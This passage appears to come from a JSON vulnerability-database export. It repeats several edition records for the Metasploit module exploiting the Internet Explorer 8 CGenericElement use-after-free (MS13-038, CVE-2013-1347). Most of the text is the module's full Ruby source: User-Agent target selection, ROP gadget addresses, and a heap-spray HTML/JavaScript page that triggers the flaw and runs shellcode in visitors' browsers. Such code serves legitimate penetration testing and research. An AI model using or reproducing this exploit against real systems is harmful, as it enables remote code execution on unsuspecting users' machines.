<< rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitReliability": "Good", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2018-04-11T22:18:25", "differentElements": ["modified", "published"], "edition": 41}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2018-04-25T14:42:49", "history": [], "viewCount": 72, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitReliability": "Good", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2018-04-25T14:42:49", "differentElements": ["modified", "published"], "edition": 42}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "2013-05-05T17:04:17", "modified": "2017-07-24T13:26:21", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2018-04-25T16:42:33", "history": [], "viewCount": 72, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitReliability": "Good", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2018-04-25T16:42:33", "differentElements": ["modified", "published"], "edition": 43}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2018-04-28T00:45:46", "history": [], "viewCount": 72, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitReliability": "Good", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2018-04-28T00:45:46", "differentElements": ["modified", "published"], "edition": 44}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "2013-05-05T17:04:17", "modified": "2017-07-24T13:26:21", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2018-04-28T02:44:56", "history": [], "viewCount": 72, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n 